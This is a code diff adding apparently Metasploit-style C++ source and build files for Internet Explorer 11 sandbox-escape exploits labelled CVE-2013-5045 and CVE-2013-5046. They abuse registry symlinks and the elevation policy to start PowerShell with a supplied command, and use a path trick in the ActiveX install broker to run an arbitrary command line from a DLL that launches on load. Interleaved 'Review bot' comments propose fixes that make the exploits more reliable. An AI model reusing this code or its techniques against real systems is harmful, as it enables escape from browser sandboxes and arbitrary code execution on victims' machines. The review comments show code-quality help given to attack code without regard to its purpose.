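+}
+
+void CreateUserKey(LPCWSTR path)
+{
+STARTUPINFO startInfo = { 0 };
+PROCESS_INFORMATION procInfo = { 0 };
+bstr_t sid = GetUserSid();
+
+bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain";
+
+LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain");
+
+DebugPrintf("Delete: %d", res);
+
+bstr_t destName = L"\\Registry\\User\\" + sid + path;
+
+CreateLink(linkName, destName, 0);
+
+CreateIEProcess();
+
+DeleteLink(linkName);
+}
+
+void DoRegistrySymlink()
+{
+STARTUPINFO startInfo = { 0 };
+PROCESS_INFORMATION procInfo = { 0 };
+HKEY hKey = nullptr;
+HANDLE hSection = nullptr;
+bstr_t sid = GetUserSid();
+bool success = false;
+
+try
+{
+CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights");
+CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy");
+CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}");
+
+LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}",
+0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
+
+if (res != 0)
+{
+DebugPrintf("Open Class Key Failed %d", res);
+throw 0;
+}
+
+CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");
+CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");
+CreateRegistryValueDword(hKey, L"Policy", 3);
+
+bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";
+
+UNICODE_STRING objName = { 0 };
+objName.Buffer = name;
+objName.Length = SysStringByteLen(name);
+objName.MaximumLength = SysStringByteLen(name);
+
+OBJECT_ATTRIBUTES objAttr = { 0 };
+
+InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0);
+
+fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection");
+
+NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr);
+
+if (status != 0)
+{
+DebugPrintf("Error opening section: %08X\n", status);
+throw 0;
+}
+
+unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int));
+
+if (p == nullptr)
+{
+DebugPrintf("Error mapping section %d\n", GetLastError());
+throw 0;
+}
+
+DebugPrintf("Current Counter: %d\n", *p);
+
+// Increment
+*p = *p + 1;
+
+DebugPrintf("New Counter: %d\n", *p);
+
+UnmapViewOfFile(p);
+CloseHandle(hSection);
+hSection = nullptr;
+
+MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));
+}
+catch (...)
+{
+}
+
+if (hSection)
+{
+CloseHandle(hSection);
+}
+
+if (hKey)
+{
+RegCloseKey(hKey);
+}
+
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+CoInitialize(nullptr);
+DoRegistrySymlink();
+CoUninitialize();
+
+FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}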
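Review bot: GetExploitUrl ignores the return value of GetEnvironmentVariable, so when HTML_URL or PSH_CMD is unset (or longer than MAX_ENV) the uninitialized 64 KB stack buffer `buf` is converted to a bstr_t and spliced into a command line by CreateIEProcess and by the powershell.exe launch at the end of DoRegistrySymlink. Check the result before returning: `DWORD len = GetEnvironmentVariable(env, buf, MAX_ENV);` then `if (len == 0 || len >= MAX_ENV) return bstr_t();`. Separately, the process handle returned by that final MyCreateProcess call is discarded rather than closed, and the empty `catch (...) {}` hides which step failed, so a DebugPrintf there would make failures diagnosable from the Metasploit side. The `startInfo`, `procInfo` and `success` locals in CreateUserKey and DoRegistrySymlink are never used and can be dropped.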
188
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj
|
@ -0,0 +1,188 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
<ProjectName>CVE-2013-5045</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<ModuleDefinitionFile>
|
||||
</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2013-5045.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,11 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
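--- a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
@@ -0,0 +1,127 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <Utils.h>
+#include <Shlwapi.h>
+
+#pragma comment(lib, "shlwapi.lib")
+
+typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
+
+void DoAXExploit()
+{
+try
+{
+HRESULT ret = E_FAIL;
+
+IIEUserBrokerPtr broker = CreateBroker();
+
+DebugPrintf("Created User Broker: %p\n", broker);
+
+IIEAxInstallBrokerBrokerPtr axInstallBroker = broker;
+
+DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker);
+
+IUnknownPtr unk;
+
+ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk);
+if (FAILED(ret))
+{
+DebugPrintf("Failed to create install broker\n");
+throw _com_error(ret);
+}
+
+IIeAxiAdminInstallerPtr admin = unk;
+
+bstr_t sessionGuid;
+bstr_t empty;
+
+ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress());
+if (FAILED(ret))
+{
+DebugPrintf("Failed initialize admin interface\n");
+throw _com_error(ret);
+}
+
+DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR());
+
+IIeAxiInstaller2Ptr installer = unk;
+
+DebugPrintf("Installer: %p", installer);
+
+unsigned char* details = nullptr;
+unsigned int detailsLength = 0;
+
+CLSID mgrclsid;
+
+// Not important really
+CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid);
+
+/*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8";
+bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/
+
+bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe";
+
+bstr_t fullPath;
+
+// Verify a local "signed" file, doesn't really matter what, we are not going to run it
+ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""),
+0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details);
+
+if (FAILED(ret))
+{
+throw _com_error(ret);
+}
+
+WCHAR newPath[MAX_PATH];
+
+wcscpy_s(newPath, fullPath);
+
+PathRemoveFileSpec(newPath);
+
+// Install file to dummy location, use canonicalization trick to escape quotes later
+ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)),
+GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0);
+DebugPrintf("InstallFile: %08X\n", ret);
+
+if (FAILED(ret))
+{
+throw _com_error(ret);
+}
+
+bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe";
+
+PROCESS_INFORMATION procInfo = { 0 };
+
+// Run our arbitrary command line
+ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo);
+}
+catch (_com_error e)
+{
+DebugPrintf("Error: %ls\n", e.ErrorMessage());
+}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+CoInitialize(NULL);
+
+DoAXExploit();
+
+CoUninitialize();
+
+FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}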
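Review bot: The HRESULT from `installer->RegisterExeFile(...)` at the end of DoAXExploit is stored in `ret` but never examined, and the PROCESS_INFORMATION it fills is dropped without closing `hProcess`/`hThread`, so a failed launch is silent and a successful one leaks two handles in the sandboxed IE process. Suggested after that call: `if (FAILED(ret)) throw _com_error(ret);` then `if (procInfo.hThread) CloseHandle(procInfo.hThread); if (procInfo.hProcess) CloseHandle(procInfo.hProcess);`. The `details` buffer returned by VerifyFile is likewise never released (presumably via CoTaskMemFree — confirm against the broker's allocation contract), and `catch (_com_error e)` copies the exception where `catch (const _com_error& e)` is the conventional form. `wcscpy_s(newPath, fullPath)` invokes the invalid-parameter handler rather than truncating if the verified path is MAX_PATH or longer, so a length check on `fullPath` before the copy would avoid aborting the host process.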
182
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj
|
@ -0,0 +1,182 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
